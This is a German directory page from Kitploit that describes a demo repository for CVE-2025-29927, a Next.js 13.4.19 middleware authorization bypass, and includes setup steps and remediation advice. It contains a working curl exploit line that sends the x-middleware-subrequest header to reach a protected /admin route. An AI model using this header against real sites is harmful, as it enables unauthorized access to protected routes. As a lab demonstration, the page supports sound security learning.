Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/all3njk/nextjs_cve-2025-29927
SchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHuball3njk/nextjs_cve-2025-29927

NextJS_CVE-2025-29927

Demonstriert den x-middleware-subrequest-Header-Bypass in Next.js 13.4.19, der unbefugten Zugriff auf geschützte Routen ermöglicht. Enthält Einrichtung, normalen Ablauf und curl-basierte Exploit-Schritte.

Repository anzeigen
6vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Next.js Autorisierungs-Bypass Demo

Diese Anwendung demonstriert die x-middleware-subrequest-Schwachstelle in Next.js 13.4.19, die das Umgehen des Middleware-Schutzes ermöglicht.

Einrichtung

  1. Abhängigkeiten installieren:
root@kitploit:~
npm install
  1. Den Entwicklungsserver starten:
root@kitploit:~
npm run dev

Schwachstellen-Demonstration

Die Anwendung hat eine Admin-Seite unter /admin, die durch Middleware geschützt sein sollte. Sie kann jedoch ohne Authentifizierung mithilfe des x-middleware-subrequest-Headers aufgerufen werden.

Normaler Ablauf

  1. Besuche /admin – Du wirst zu /login weitergeleitet
  • Melde Dich mit beliebigen Anmeldedaten an – Du wirst zu /admin weitergeleitet
  • Bypass-Methode

    Um die Authentifizierung zu umgehen, kannst Du curl oder einen beliebigen HTTP-Client verwenden, um eine Anfrage mit dem x-middleware-subrequest-Header zu senden:

    root@kitploit:~
    curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin
    

    Sicherheitsauswirkungen

    Diese Schwachstelle zeigt, wie der Middleware-Schutz in Next.js 13.4.19 durch die Verwendung des x-middleware-subrequest-Headers umgangen werden kann. In einer Produktionsumgebung könnte dies unbefugten Zugriff auf geschützte Routen ermöglichen.

    Behebung

    Um diese Schwachstelle zu beheben, aktualisiere auf eine neuere Version von Next.js, in der dieses Problem behoben wurde.

    Tool herunterladen